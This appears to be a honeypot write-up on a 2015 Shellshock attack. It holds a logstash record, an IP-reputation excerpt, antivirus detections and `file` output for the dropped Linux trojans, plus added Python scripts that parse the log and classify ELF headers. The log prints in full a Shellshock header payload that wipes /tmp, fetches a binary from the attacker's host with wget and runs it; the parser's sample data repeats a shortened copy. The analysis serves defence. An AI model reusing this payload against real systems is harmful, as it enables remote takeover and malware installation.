{"message":"Jul 13 06:38:52 localhost [mypyfwa] 2015-07-13 06:38:52.540616 211.147.2.192 - - [12/Jul/2015:20:48:02 +0200] \"GET / HTTP/1.1\" 404 442 \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" 211.147.2.192 CN SHELLinjection","@version":"1","@timestamp":"2015-07-13T04:38:52.586Z","type":"syslog","file":"/var/log/smsids.log","host":"beeswarm","offset":"26328","tags":["_grokparsefailure"],"syslog_severity_code":5,"syslog_facility_code":1,"syslog_facility":"user-level","syslog_severity":"notice"}
All attacks originated from the same source IP:
- 211.147.2.192
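As an added example (not part of the original post), the following Python script shows how a defender would parse a beeswarm/logstash record like the one above, flag the Shellshock function-definition pattern `() { :; };` in the request headers, and pull out the indicators worth pivoting on: the source IP, the download URL of the dropper and the paths it writes under /tmp. The sample record is constructed here and shortened from the real line; the field names (`message`, `@timestamp`, `host`) are the ones visible in the record above.

```python
import json
import re
from urllib.parse import urlsplit

# Constructed sample, modelled on the beeswarm syslog/JSON record shown above.
# The payload is abbreviated; the real line carries the full Run.sh dropper.
SAMPLE_RECORD = json.dumps({
    "message": (
        'Jul 13 06:38:52 localhost [mypyfwa] 2015-07-13 06:38:52.540616 '
        '211.147.2.192 - - [12/Jul/2015:20:48:02 +0200] "GET / HTTP/1.1" 404 442 '
        '"() { :; }; /bin/bash -c \\"rm -rf /tmp/*;'
        'echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn >> /tmp/Run.sh;'
        'chmod 777 /tmp/Run.sh;/tmp/Run.sh\\"" '
        '"() { :; }; /bin/bash -c \\"wget http://211.147.2.192:911/1122.64\\"" '
        '211.147.2.192 CN SHELLinjection'
    ),
    "@timestamp": "2015-07-13T04:38:52.586Z",
    "type": "syslog",
    "host": "beeswarm",
})

# Shellshock trigger: an exported-function definition "() { ... }" followed by a
# trailing command after the closing brace. Whitespace varies between scanners.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s\"'\\;]+")
# Files the dropper writes; "/tmp/*" (the wipe) is deliberately not matched.
PATH_RE = re.compile(r"/tmp/[\w.\-]+")


def is_shellshock(text: str) -> bool:
    """True when the text contains the Shellshock function-definition prefix."""
    return SHELLSHOCK_RE.search(text) is not None


def analyse_record(raw_json: str) -> dict:
    """Parse one logstash JSON line and return the extracted indicators.

    The first IPv4 address in the message is the client address of the
    access-log fragment, which is the attacking source in this honeypot setup.
    """
    rec = json.loads(raw_json)
    msg = rec.get("message", "")
    result = {
        "shellshock": is_shellshock(msg),
        "timestamp": rec.get("@timestamp"),
        "host": rec.get("host"),
        "source_ip": None,
        "download_urls": [],
        "download_hosts": [],
        "dropped_paths": [],
    }
    if not result["shellshock"]:
        return result
    ips = IPV4_RE.findall(msg)
    result["source_ip"] = ips[0] if ips else None
    urls = sorted(set(URL_RE.findall(msg)))
    result["download_urls"] = urls
    # The host serving the dropper is often, as here, the scanning host itself.
    result["download_hosts"] = sorted({urlsplit(u).hostname for u in urls})
    result["dropped_paths"] = sorted(set(PATH_RE.findall(msg)))
    return result


if __name__ == "__main__":
    print(json.dumps(analyse_record(SAMPLE_RECORD), indent=2))
```

Run against a whole `smsids.log` export, one JSON object per line, the same function yields a list of source IPs and dropper URLs that can be fed into a blocklist or a threat-intel lookup such as the X-Force query whose output appears below.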
"ip": "211.147.2.192",
"subnets": [
  {
    "categoryDescriptions": {},
    "cats": {},
    "created": "2012-03-22T07:26:00.000Z",
    "geo": {
      "country": "China",
      "countrycode": "CN"
    },
There were three different files within the attacks:
- ./1122.32: Linux.Trojan.IptabLex FOUND
- ./1122.64: Linux.Trojan.IptabLex FOUND
- ./8uc: Unix.Trojan.DDoS_XOR-1 FOUND
pi@raspberrypi ~/ana $ file 1122.32
1122.32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 1122.64
1122.64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 8uc
8uc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
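The `file` output above comes from reading the ELF header. As an added example (my own code, not from the post), the following Python function does the same first triage step without executing anything: it checks the magic, the ELF class (32/64-bit), byte order, object type and target machine, which is enough to decide which sandbox or disassembler a dropped sample like 1122.32 or 1122.64 belongs in. The two headers it is run on are constructed in the script; the "statically linked" verdict `file` adds needs the program headers and is not reproduced here.

```python
import struct

ELF_MAGIC = b"\x7fELF"
CLASSES = {1: "ELF32", 2: "ELF64"}
ENDIANS = {1: "LSB", 2: "MSB"}
TYPES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
MACHINES = {3: "Intel 80386", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def classify_elf(blob: bytes) -> dict:
    """Return class, byte order, object type and machine of an ELF blob.

    Raises ValueError for anything that is not a well-formed ELF header, so a
    renamed or truncated download is reported instead of silently misread.
    """
    if len(blob) < 20 or blob[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = blob[4], blob[5]
    if ei_class not in CLASSES or ei_data not in ENDIANS:
        raise ValueError("unknown ELF class or data encoding")
    # e_type and e_machine follow the 16-byte e_ident, in the file's own byte order.
    prefix = "<" if ei_data == 1 else ">"
    e_type, e_machine, e_version = struct.unpack_from(prefix + "HHI", blob, 16)
    if e_version != 1:
        raise ValueError("unsupported ELF version %d" % e_version)
    return {
        "class": CLASSES[ei_class],
        "endian": ENDIANS[ei_data],
        "type": TYPES.get(e_type, "unknown(%d)" % e_type),
        "machine": MACHINES.get(e_machine, "unknown(%d)" % e_machine),
    }


def build_header(bits: int, e_type: int, e_machine: int) -> bytes:
    """Build a minimal little-endian ELF header for testing (constructed data)."""
    ident = ELF_MAGIC + bytes([1 if bits == 32 else 2, 1, 1, 0, 0]) + b"\0" * 7
    if bits == 32:   # e_entry/e_phoff/e_shoff are 4 bytes each: 52-byte header
        body = struct.pack("<HHIIIIIHHHHHH", e_type, e_machine, 1, 0, 0, 0, 0, 52, 32, 0, 40, 0, 0)
    else:            # 8-byte addresses/offsets: 64-byte header
        body = struct.pack("<HHIQQQIHHHHHH", e_type, e_machine, 1, 0, 0, 0, 0, 64, 56, 0, 64, 0, 0)
    return ident + body


# Constructed stand-ins for the 32-bit and 64-bit droppers seen in the log.
SAMPLE_32 = build_header(32, 2, 3)    # like 1122.32 / 8uc: i386 executable
SAMPLE_64 = build_header(64, 2, 62)   # like 1122.64: x86-64 executable

if __name__ == "__main__":
    for name, blob in (("1122.32-like", SAMPLE_32), ("1122.64-like", SAMPLE_64)):
        print(name, classify_elf(blob))
```

On a real sample, read the first 64 bytes of the file and pass them to `classify_elf`; a mismatch between the architecture the dropper script expected (it chose 1122.64 for this 64-bit honeypot) and what the header says is itself a useful triage observation.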